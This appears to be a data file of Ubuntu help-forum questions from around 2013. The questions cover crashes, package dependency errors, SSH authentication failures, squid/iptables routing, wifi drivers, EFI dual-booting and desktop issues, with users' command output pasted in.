343045	ubuntu 13.04 python3.3/tkinter/ibus/x11 crash bug where to next	i want to report a crash bug in python3.3.2 that seems to be happening in x11 but am not sure where to go next . the bug happens when i reset ibus for japanese input . i 've compiled python3.3.2 and tk8.6 with debug . the stack trace is below . the crash is in x11 -- which is beyond my knowledge . where do i report this ? gnu gdb ( gdb ) 7.5.91.20130417-cvs-ubuntu copyright ( c ) 2013 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . type `` show copying '' and `` show warranty '' for details . this gdb was configured as `` i686-linux-gnu '' . for bug reporting instructions , please see : < http : //www.gnu.org/software/gdb/bugs/ > ... reading symbols from /usr/bin/python3.3 ... done . warning : core file may not match specified executable file . [ new lwp 20441 ] [ new lwp 20442 ] warning : ca n't read pathname for load map : input/output error . [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . core was generated by `/usr/bin/python3 ./worldunitsconvert.py ' . program terminated with signal 11 , segmentation fault . # 0 0x00000153 in ? ? ( ) ( gdb ) where # 0 0x00000153 in ? ? ( ) # 1 0xb6cb9b91 in xutf8lookupstring ( ) from /usr/lib/i386-linux-gnu/libx11.so.6 # 2 0xb70893bf in tkpgetstring ( winptr=0xa4838f8 , eventptr=0xbfbcdac8 , dsptr=0xbfbcdb28 ) at /home/sjs/dev/python/tk8.6.0/unix/../unix/tkunixkey.c:122 # 3 0xb70833ed in transferxeventstotcl ( display=0xa239e10 ) at /home/sjs/dev/python/tk8.6.0/unix/../unix/tkunixevent.c:342 # 4 0xb708348a in displaycheckproc ( clientdata=0x0 , flags=-3 ) at /home/sjs/dev/python/tk8.6.0/unix/../unix/tkunixevent.c:382 # 5 0xb6eb8676 in tcl_dooneevent ( flags=-3 ) at /home/sjs/dev/python/tcl8.6.0/generic/tclnotify.c:963 # 6 0xb715fe5c in tkapp_mainloop ( selfptr=0xb71dd7a8 , args=0xb70ed45c ) at /home/sjs/dev/python/python-3.3.2/modules/_tkinter.c:2542 # 7 0x0821763c in pycfunction_call ( func=0xb641276c , arg=0xb70ed45c , kw=0x0 ) at objects/methodobject.c:81 # 8 0x08106adb in call_function ( pp_stack=0xbfbcddc4 , oparg=1 ) at python/ceval.c:4063 # 9 0x08100dff in pyeval_evalframeex ( f=0xb71aa484 , throwflag=0 ) at python/ceval.c:2679 # 10 0x08104b51 in pyeval_evalcodeex ( _co=0xb717abf0 , globals=0xb72bdb5c , locals=0x0 , args=0xb758da0c , argcount=1 , kws=0xb758da10 , kwcount=0 , defs=0xb71b0358 , defcount=1 , kwdefs=0x0 , closure=0x0 ) at python/ceval.c:3433 # 11 0x08107041 in fast_function ( func=0xb71b3bd4 , pp_stack=0xbfbce614 , n=1 , na=1 , nk=0 ) at python/ceval.c:4161 # 12 0x08106c71 in call_function ( pp_stack=0xbfbce614 , oparg=0 ) at python/ceval.c:4084 # 13 0x08100dff in pyeval_evalframeex ( f=0xb758d8cc , throwflag=0 ) at python/ceval.c:2679 # 14 0x08104b51 in pyeval_evalcodeex ( _co=0xb7207b88 , globals=0xb72e67a4 , locals=0xb72e67a4 , args=0x0 , argcount=0 , kws=0x0 , kwcount=0 , defs=0x0 , defcount=0 , kwdefs=0x0 , closure=0x0 ) at python/ceval.c:3433 # 15 0x080f4c31 in pyeval_evalcode ( co=0xb7207b88 , globals=0xb72e67a4 , locals=0xb72e67a4 ) at python/ceval.c:771 # 16 0x081365ca in run_mod ( mod=0xa259258 , filename=0xb72ab840 `` ./worldunitsconvert.py '' , globals=0xb72e67a4 , locals=0xb72e67a4 , flags=0xbfbceed8 , arena=0xa21ddd0 ) at python/pythonrun.c:1981 # 17 0x081363ee in pyrun_fileexflags ( fp=0xa252c60 , filename=0xb72ab840 `` ./worldunitsconvert.py '' , start=257 , globals=0xb72e67a4 , locals=0xb72e67a4 , closeit=1 , flags=0xbfbceed8 ) at python/pythonrun.c:1937 # 18 0x08134ad0 in pyrun_simplefileexflags ( fp=0xa252c60 , filename=0xb72ab840 `` ./worldunitsconvert.py '' , closeit=1 , flags=0xbfbceed8 ) at python/pythonrun.c:1447 # 19 0x08133d5f in pyrun_anyfileexflags ( fp=0xa252c60 , filename=0xb72ab840 `` ./worldunitsconvert.py '' , closeit=1 , flags=0xbfbceed8 ) at python/pythonrun.c:1169 # 20 0x081569a7 in run_file ( fp=0xa252c60 , filename=0xb7567028 l '' ./worldunitsconvert.py '' , p_cf=0xbfbceed8 ) at modules/main.c:306 # 21 0x081575ae in py_main ( argc=2 , argv=0xb7565028 ) at modules/main.c:743 # 22 0x0805c8f6 in main ( argc=2 , argv=0xbfbcf074 ) at ./modules/python.c:58 ( gdb ) quit
343046	link for download ooobasis3.4-core01	when i was going to install openoffice 3.4 sdk i got an error ooobasis3.4-core01 is not found . but i could n't find a place where ooobasis3.4-core01 can be downloaded . can you give me a link which ooobasis3.4-core01 can be downloaded ?
343047	installing skype on ubuntu 13.04 64-bit	here is what i tried : $ sudo apt-get install skype [ sudo ] password for umpirsky : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . $ sudo apt-get install skype-bin reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-bin : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) but it is not going to be installed depends : libc6 : i386 ( > = 2.7 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . i also tried all suggestions from unable to install skype on 12.10 64bit , but none of them worked for me . my sources list : $ cat /etc/apt/souces.list /etc/apt/sources.list.d/*.list cat : /etc/apt/souces.list : no such file or directory deb http : //downloads.hipchat.com/linux/apt stable main deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/screencloud/ubuntu raring main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/splashtop-streamer/ubuntu raring main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/vkaudiosaver/ubuntu raring main # added by software-center ; credentials stored in /etc/apt/auth.conf deb http : //ppa.launchpad.net/upubuntu-com/chat/ubuntu quantal main # deb-src http : //ppa.launchpad.net/upubuntu-com/chat/ubuntu raring main please help . update : i tried to install teamviewer and got similar error : update : i just installed fresh ubuntu 13.04 and got same error . update : i installed skype with : sudo dpkg -- force-depends -i skype-ubuntu-precise_4.2.0.11-1_i386.deb but ca n't run it : $ ll /usr/bin | grep skype -rwxr-xr-x 1 root root 30701056 мај 7 01:42 skype* $ /usr/bin/skype bash : /usr/bin/skype : no such file or directory update : i am able to reproduce this without installing ubuntu , from live cd .
343051	less gb in ubuntu one than in hdd	i have installed ubuntu one application . i 've bought 20 gb of space on ubuntu one . on my computer , i have my files into another partition different from the os partition . so , to achieve having the folder that i want to sync with u1 under my home folder , i 've made a bind mount of that folder in /home/ivan/myfolder then , i 've selected from u1 application 'add a folder ... ' and all seemed to went right , but when the synchronization ended both u1 application and website tell me that i have 5.6gb used but my os tells me that the same folder in my computer 's hdd has 7.6gb . it seems that all the child folders are there but his content is very extensive so i ca n't check if all my files are there . is it normal ? thanks .
343053	how to remove application that is `` not installed '' ?	ubuntu 12.04.3 64-bit . installed app `` implosion '' from software center . tried it out , and removed it via software center . but it is still installed and playable ! reinstalled from sc and removed again , but same result . sudo apt-get remove/ purge implosion says implosion is not installed . dpkg -l implosion says implosion is not installed . i can not locate implosion-files in /usr/bin . system says it 's not there , but it is ! how do i find it and remove it ?
343056	should i install intel linux graphics ( gma 4500 mhd ) ?	i am wondering if i should install intel linux graphics if i 'm using computer with intel gma 4500 mhd graphics card . everything is working fine ( currently using ubuntu 13.04 ) but i 'm just curious . output from glxinfo ~ > glxinfo | grep `` opengl version '' opengl version string : 2.1 mesa 9.1.3
343058	can a deja dup backup from ubuntu be restored on windows ?	my laptop got broken recently ( i had ubuntu on it ) , and i 've backups of my files on external hdd . the problem is that my new laptop has windows 8 on it and i do n't feel like switching to ubuntu on it just yet . is there a way to restore my precious audio and video files to my new computer ( all backup files are on gpg-format ) ?
343059	install software without root access ?	is it possible to give a user the rights to install software , without giving him other sudo-rights ? let 's say i were to install ubuntu on the student 's computers at a school . i would like them to be able to install software from the software center , but not to do anything else to the system .
343060	no more authentication methods to try . permission denied ( publickey )	i have set up a home network behind a router a while ago and use openssh to access the network consisting of my laptop , wife 's netbook and my desktop all running l/x/ubuntu 12.04 . this worked perfectly for some time . i am now only able to access from and to the netbook and the other 2 , but no access between the laptop and desktop . i have never used the id_* route so have no id_* files in the ~/.ssh directories . i have tried various strategies advised on forums such as this one eg . deleting the known_hosts and changing the configuration files such as the passwordauthentication to no , yes and commented out . none of which works . the only thing i can think of is that my recent tinkering with setting up a vpn network between the laptop and desktop may have changed something to disrupt the working of ssh between these 2 machines . btw i have not managed to get the vpn to work yet ( see previous post on this forum ) . the /etc/ssh/sshd_config file on my desktop is : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords # passwordauthentication yes # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp internal-sftp # /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes match user sftpuser # group sftponly chrootdirectory /media/backups/ftp x11forwarding yes allowtcpforwarding yes forcecommand internal-sftp the ssh -v laptop command outputs : openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /home/malapradej/.ssh/config debug1 : /home/malapradej/.ssh/config line 1 : applying options for laptop debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to 192.168.0.2 [ 192.168.0.2 ] port 22. debug1 : connection established . debug1 : identity file /home/malapradej/.ssh/id_rsa type -1 debug1 : identity file /home/malapradej/.ssh/id_rsa-cert type -1 debug1 : identity file /home/malapradej/.ssh/id_dsa type -1 debug1 : identity file /home/malapradej/.ssh/id_dsa-cert type -1 debug1 : identity file /home/malapradej/.ssh/id_ecdsa type -1 debug1 : identity file /home/malapradej/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 zlib @ openssh.com debug1 : kex : client- > server aes128-ctr hmac-md5 zlib @ openssh.com debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 1e : f2:57:81:28:8a:12 : d3:7e:2d:04 : c2:82:4f:43:72 debug1 : host '192.168.0.2 ' is known and matches the ecdsa host key . debug1 : found key in /home/malapradej/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : trying private key : /home/malapradej/.ssh/id_rsa debug1 : trying private key : /home/malapradej/.ssh/id_dsa debug1 : trying private key : /home/malapradej/.ssh/id_ecdsa debug1 : no more authentication methods to try . permission denied ( publickey ) .
343061	squid with ubuntu server , iptables explanation	to begin with , i 'm a linux newb . i have setup a squid proxy on my home network and it is working fine . i went through couple of tutorials to get this working . my setup is : internet- > modem- > router-my devices ( including squid proxy server ) . following are the iptables changes i made in my router : my proxy ip 192.168.1.130 iptables -t mangle -a prerouting -p tcp -- dport 80 -s 192.168.1.130 -j accept iptables -t mangle -a prerouting -p tcp -- dport 80 -j mark -- set-mark 3 ip rule add fwmark 3 table 2 ip route add default via 192.168.1.130 dev br0 table 2 changes made to iptables on proxy server : iptables -a prerouting -t nat -i eth0 -p tcp -- dport 80 -j redirect -- to-port 3128 i 'm having a hard time understanding how my router is routing http traffic to the proxy server , here is what i 'm understanding from it ( very little -.- ) iptables -t mangle -a prerouting -p tcp -- dport 80 -s 192.168.1.130 -j accept with that command , the router will accept tcp packets coming from my proxy server destined to port 80 , however i do n't understand the destination port 80 part of it because i 'm redirecting incoming tcp packets over 80 to 3128 on my proxy machine . iptables -t mangle -a prerouting -p tcp -- dport 80 -j mark -- set-mark 3 with that command , the firewall will mark all tcp packets destined to port 80 with 3 ( i have no clue what i 'm talking about ) . ip rule add fwmark 3 table 2 does that add mark 3 to table 2 ? ip route add default via 192.168.1.130 dev br0 table 2 that matches the marked tcp packets and routes them through my proxy ? iptables -a prerouting -t nat -i eth0 -p tcp -- dport 80 -j redirect -- to-port 3128 all incoming tcp packets destined to port 80 on interface eth0 will be redirected to port 3128 on the proxy server . please help me understand what the process . thanks .
343066	how to delete a non-working kernel after update ?	i have . a simple question . after i updated my kernel , i could n't boot ( stuck on purple screen ) unless i chose the old kernel . so how do i delete the new kernel with synaptic . and how do i do this safely ? i 'm in quantal quetzel . my kernel is 3.5.0-40 . the working kernel is 3.5.0-39 . also , how do i stop kernel updates from appearing in the update manager ? thanks .
343068	intel 2200bg wireless card unable to establish wep connection with router	i 've just starting using ubuntu & completed a clean install of ubuntu 12.04.3 lts on a compaq nc6230 laptop with an intel pro/ wireless 2200bg wireless card . after the installation , i ca n't connect my nc6230 ( laptop 1 ) to my home wifi router ( linksys wag200g ) using wep encryption . i encountered the wep connection problem immediately after the initial os installation . here 's a summary of the symptoms i 'd encountered : i can enable the wifi card by pressing the wifi quick launch button . network manager can detect & list the ap ( same ap i connect to with another laptop ) . network manager shows it 's trying to connect to the ap ( blinking icon in system tray ) . on the nc6230 ( laptop 1 ) , network manager will keep prompting me to key in the wep password every few minutes . i 'd deleted the old wifi connection in network manager and create a brand-new connection . network manager still prompts for the wep password . i 'd installed the same ubuntu os ( 64-bit ) on another laptop ( laptop 2 - compaq 6510b with intel pro/ wireless 4965 ag or agn [ kedron ] ) which can connect to the same router with the same wep settings . note : i 'd encountered the similar problem with my laptop 2 earlier on . i managed to resolve the problem after performing a clean os reinstall and upgrade the firmware/ driver of the intel pro 4965 ag wireless card ) . i 've tried resetting laptop 1 's bios back to default settings ( as suggested in a posting on ubuntu forums ) but i 'm still encountering the same problem . i could connect to the same ap when i was still running winxp on laptop 1 . since the initial installation , laptop 1 can connect to the internet with my ethernet connection . all latest system updates 've been installed & laptop 1 successfully rebooted . how do i resolve this problem ? i 've searched through the various ubuntu forums & tried out several suggested solutions ( see above ) but the problem still persists . do i need to upgrade laptop 1 's intel 2200bg 's firmware and/or driver ? where can i download the updated version of this firmware/ driver ? could this problem caused by network manager ? cheers . p.s . : i 'd enclosed some info on laptop 1 's network h/w details . output for sudo lshw -c network *-network description : ethernet interface product : netxtreme bcm5751m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : eth0 version : 11 serial : 00:12:79 : be : ff:79 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.128 duplex=full firmware=5751m-v3.29a ip=192.168.1.100 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : c8000000-c800ffff *-network description : wireless interface product : pro/wireless 2200bg [ calexico2 ] network connection vendor : intel corporation physical id : 4 bus info : pci @ 0000:02:04.0 logical name : eth1 version : 05 serial : 00:15:00:15 : a9 : e5 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2200 driverversion=1.2.2kmprq firmware=abg:9.0.5.27 ( dec 12 2007 ) latency=64 link=no maxlatency=24 mingnt=3 multicast=yes wireless=ieee 802.11bg resources : irq:21 memory : c8100000-c8100fff enter code here output for lspci 02:04.0 network controller : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) 10:00.0 ethernet controller : broadcom corporation netxtreme bcm5751m gigabit ethernet pci express ( rev 11 ) rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no output for nm-tools state : connected ( global ) - device : eth1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : ipw2200 state : unavailable default : no hw address : 00:15:00:15 : a9 : e5 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : 00:12:79 : be : ff:79 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 165.21.83.88 dns : 165.21.100.88 output for iwconfig lo no wireless extensions . enter code here eth0 no wireless extensions . eth1 ieee 802.11bg essid : '' homebase '' mode : managed frequency:2.462 ghz access point : 00:18:39:39:81:42 bit rate:0 kb/s tx-power=20 dbm sensitivity=8/0 retry limit:7 rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0s output for sudo modprobe ipw2200 no output
343082	explanation needed : installing ubuntu in efi mode	i am not very good with linux and efi , but i wish to dual-boot ubuntu and pre installed windows 8 on my laptop . windows 8 is definitely installed in efi mode , and i boot ubuntu from my flash drive in efi mode . i have been looking at the page explaining uefi ( https : //help.ubuntu.com/community/uefi ) but it is all very confusing to me , as i am inexperienced with these things . i know how to partition my hard drive and everything , but according to the page , if i have windows 8 partitioned in an efi partition , i can install ubuntu into the same partition and it will be installed in efi mode ? excuse me if i 'm wrong , but is this true ? i can not afford to mess up my laptop , as i only saved up enough money to buy 1 . so can anyone offer me a simple , step by step explanation on how i can install ubuntu to dual-boot with pre-installed efi windows 8 successfully ? all i have seen is a `` figure it out yourself '' and `` poke around in bios '' tutorials with just snips of information . thank you , and i will appreciate any help i can get . -ben
343084	what is the right wayâ˘ to run a minecraft server ?	i want to run a minecraft server on ubuntu 12.04 server in a maintainable and secure way . i know about creating an own user for minecraft to avoid running as root . i know about using screen to be able to detach from the session without the server stopping . still , this all seems like patchwork , as opposed by say ... a mysql server that will automatically update when there are security fixes , that will automatically start on boot etc etc . so , since there are a bunch of servers out there and probably some smart people wanting the same thing , are there any cleaner/more beautiful/more elegant ways of packaging/running a minecraft server on let 's say a 12.04 vroot server ? i have seen this question : running minecraft server on ubuntu server this seems very unmaintainable , and if my server reboot for whatever reasons i have to manually start it again . that 's why i would prefer something cleaner . if not , why not ? ( < -- this is obviously just to satisfy my curiosity )
343085	unable to repair boot with windows 8 and ubuntu 13.04	i have a samsung laptop np350e7c . it comes with windows 8 and i 'm trying to install ubuntu 13.04 . the first time i installed it with the live usb , it worked , but windows stopped working . i repaired windows and now there is not way to reboot on ubuntu . i even tried to use windows ' boot manager instead of grub2 with no success . i then followed the instructions at http : //doc.ubuntu-fr.org/uefi ? redirect=1 ( disabled fastboot and secureboot in the bios ) and re-installed ubuntu . i then had the windows blue screen as predicted by this tutorial and i could repair it with the instructions from their link . than , i needed to repair ubuntu 's boot with boot-repair . using the recommended options , i always get to this error : an error occurred during the repair . locked-esp detected . you may want to retry after creating a /boot/efi partition ( fat32 , 100mb~250mb , start of the disk , boot flag ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot/efi partition : ] option of [ boot repair ] . according to this thread http : //ubuntuforums.org/showthread.php ? t=2112273 the problem is that the file /efi/ubuntu/grubx64.efi is corrupted and then if we can remove it and run boot repair again , everything should work fine . i then removed the file using the instructions at how can i remove ubuntu from the uefi boot options ? but every time , i run boot repair i still get the same error . my logs are at http : //paste.ubuntu.com/6081052/ any help is very appreciated . thanks again
343086	how do i install a ubuntu on the cloud that can be accessed by any computer browser ?	i would like to install ubuntu and eventually a virtual os of windows inside ubuntu in the cloud that can be accessed by any browser . in case i lose or damage my computer i wish not only to access ubuntu by another computer but also run it 's applications 24/7 . does juju do this ? any suggestions or instruction manuals you can send me to implement this will be greatly appreciated .
343092	duplicate ( spotify ) icon in launcher	i have installed spotify on ubuntu 13.04 and have locked the icon on the launcher . but when i exit the program fully or even restart and use that icon to open spotify , a new icon is created or a different icon is generated with a ? on it . it is a clean install of ubuntu 13.04 so was wondering if this is a known bug or if there was a way of making sure it just does n't created a duplicate icon ? n.b it has not happened as of yet to any other program i have installed ( chrome & steam )
343093	how to make vm boot from live cd	i have created a vm for ubuntu 13.04 and configured it to boot from live cd ( i want to try fedora on it ) , but it does n't boot . it displays a shell terminal i think and this is it .
343096	wifi drivers wont function	i 've been trying to get my wifi drivers on my laptop working for a week or so now and every video and thread has not helped me out . i know i need to use sudo apt-get install b43-fwcutter but whenever i type it into terminal , i get : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package b43-fwcutter a suggestion was to put lspci -vvnn | grep 14e4 in terminal : 09 : ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5755m giga bit ethernet pci express [ 14e4:1673 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev01 ) sudo apt-get install linux-firmware-nonfree : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-firmware-nonfree
343097	is there a 64-bit version for intel systems ?	i am downloading the 64 bit version , but the tar file is labeled amd64.tar.xz ... will this work on mhy intel 64 system , or should i just use the 32bit version ?
343102	ubuntu installation on disk already dual boot formatted	i have an older toshiba laptop ( about 6 years old ) formatted for suse 11.2 and windows xp for dual boot . i want to reformat the hard drive and to install ubuntu 12.04.3 lts as the sole operating system . i have an open usb port . i can also use a usb flash drive to load the ubuntu installation files to either current hard disk partition . i can also use a portable hard disk as the source for installation files . finally , i could make a dvd which i think the laptop could read . ( it will certainly read cds , but i 'm not totally sure about dvds . ) what should i do ?
343103	xhost : unable to open display ( setting up vino on vps )	i 'm currently trying to setup vino ( the vnc server ) on a vps of mine . however , whenever i try exporting and opening the display , it does n't work . i 've looked for hours last night for a solution for this , but i 've read everything i can find , and still it does n't seem to help . the part that seems to be having problems : joe @ ubuntu12 : ~ $ vino-preferences ( vino-preferences:1513 ) : gtk-critical ** : gtk_entry_set_text : assertion `text ! = null ' failed joe @ ubuntu12 : ~ $ sudo -s [ sudo ] password for joe : root @ ubuntu12 : ~ # export display=:0.0 root @ ubuntu12 : ~ # xhost + xhost : unable to open display `` :0.0 '' root @ ubuntu12 : ~ # top based on this ( i know it 's from 2006 ) : http : //ubuntuforums.org/showthread.php ? t=266981 vino preferences opens ( using my remote computer , which is also running ubuntu ) despite the error . i 've tried installing ubuntu desktop ( as well as all the other things people have suggested - excluding vnc servers , i skipped people saying to use things other than vino , in order to avoid conflicts . early on i installed vnc4server , but that was quickly removed again using apt . ) anyone got any ideas ? it 's running ubuntu 12.04.3 lts ( server ) .
343106	printer samsung ml-2165w	i could n't make samsung ml-2165w work for ubuntu 13.04 . i had general linux driver from samsung installed . the installation was succesfull , printer did n't print a test page .
343108	ubuntu vs lubuntu for desktop ?	are the ui and speed of operation the only differences ? i want to know if the functionality is the same or not . thanks .
343114	how to check for errors in ram via linux ?	i have ubuntu 11 running off a 3.6gb usb flash/stick drive . system has 4gb ram and blank harddisk ( wiped using dban tool ) . how do i check if there are no errors in my ram ? is there a guaranteed way to check that via some linux command ? if not , it would be great to know why . thanks .
343118	how to run the software center ( it is not in the unity cog menu ) ?	i ca n't for the life of me figure out where to find the software center ... i know you can run it from the terminal but i 'd rather do it visually . this is in ubuntu 12.04.3 .
343124	how to remove kde desktop from ubuntu	so i installed kde desktop from this repository ppa : kubuntu-ppa/backports and installed it sudo apt-get install kde-standard kubuntu-desktop i am hating kde and want to get ride of it so i want to remove it . is there a way to completely remove kde desktop with its software without braking my ubuntu install . thank you in advanced
343127	where does a compiled program go ?	i followed instructions to download wine 1.7.1 source to apply a patch to insert into playonlinux . the compiling seems to go well , it says build complete at the end . but now what ? the source folder has a million things in it . how do i know it even worked right ? note : i do n't want to replace my default wine , or i would do make install like the instructions say . i want to insert it into playonlinux to use as a prefix commands that i 've used : cd wine-1.7.1 wget -q http : //dl.dropboxusercontent.com/u/6901628/disable-dynamic-vertex-buffers.patch -o - | patch -p1 ./configure make
343129	touchscreen support for ubuntu 12.04lts	im currently using a lenovo ideapad p400 touch and created a liveusb version of ubuntu 12.04lts and i 'm wondering how to get the touchscreen working on ubuntu . i have read a couple of forums and saw answers for ubuntu 13 and i 'm also aware it has an issue with the time it takes to recognize the touchscreen device . i am a relatively novice linux user , but have been using it for quite some time .
343136	does ubuntu have the abnt2 brazilian layout ?	in version ubuntu 12.04 does not come with the keyboard to abnt2 brazilian ? what should i do ?
343138	mailman on apache2 : bug in mailman version 2.1.14 , sender address rejected : domain not found	i am trying to set up mailman on postfix . i have it up and when i go to it in my web browser it loads the page but there is a error message that comes up . it says ( bug in mailman version 2.1.14 ) . any help would be great . this is the log file i get from my server . ( sep 8 17:58:21 ftp-mail-server postfix/smtpd [ 12851 ] : noqueue : reject : rcpt from localhost [ 127.0.0.1 ] : 450 4.1.8 < mailman-bounces @ mail > : sender address rejected : domain not found ; from= < mailman-bounces @ mail > to= < metrikcorp @ yahoo.com > proto=esmtp helo= < [ 127.0.1.1 ] > )
343142	how to invoke git gui ?	i installed git ( the one that says `` fast , scalable , distributed revision control system '' ) from ubuntu software center . i also choose the optional packs ( git-gui and gitk ) . all of these steps got successfully completed but i am not sure how to invoke git-gui . can some one let me know how ?
343147	is there any way to install mpv without having to compile it from source ?	hello does any know about/or have a mpv package compiled for 13.04 ? i have searched for a ppa without any luck .
343155	gwibber super strange interface	if i run gwibber from terminal like below : candy @ candy-bane : ~ $ gwibber ( gwibber:3695 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ` ! g_slist_find ( group , radio_button ) ' failed ( gwibber:3695 ) : gtk-critical ** : gtk_widget_show : assertion `gtk_is_widget ( widget ) ' failed loading plugin for twitter loading plugin for facebook loading plugin for identica then the result of my gwibber is : update and use this social media built-in toy , or suggest me a good one ?
